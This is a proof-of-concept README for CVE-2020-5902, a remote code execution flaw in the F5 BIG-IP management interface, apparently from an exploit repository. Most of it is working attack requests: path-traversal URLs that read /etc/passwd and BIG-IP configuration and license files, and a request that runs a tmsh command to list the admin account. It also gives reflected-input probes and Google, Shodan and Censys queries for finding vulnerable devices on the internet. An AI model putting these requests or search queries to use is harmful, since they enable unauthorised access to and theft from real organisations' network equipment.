# CVE-2020-5902
## Summary
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
### Proof Of Concept
```bash
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
```bash
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse
inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"
~~ Try use the following queries for shodan:
1. F5-login-pages
2. www-authenticate: Basic realm:BIG-IP
3. BigIP / BIG-IP
4. htt.favicon.hash:-335242539
5. http.title:"BIG-IP&req:- Redirect"
~~ Try use the following queries for censys:
1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
2.433.https.get.title:"BIG-IP&req:- Redirect"
```
##Hello##
```bash
i'm Rizki Ardian
how are you today??
```
[4.0K] /data/pocs/fb7c8f234637d21f3fa6e5fe9b8e6bccc08846ec
├── [1.6K] README.md
└── [4.2K] script-rce.nse
0 directories, 2 files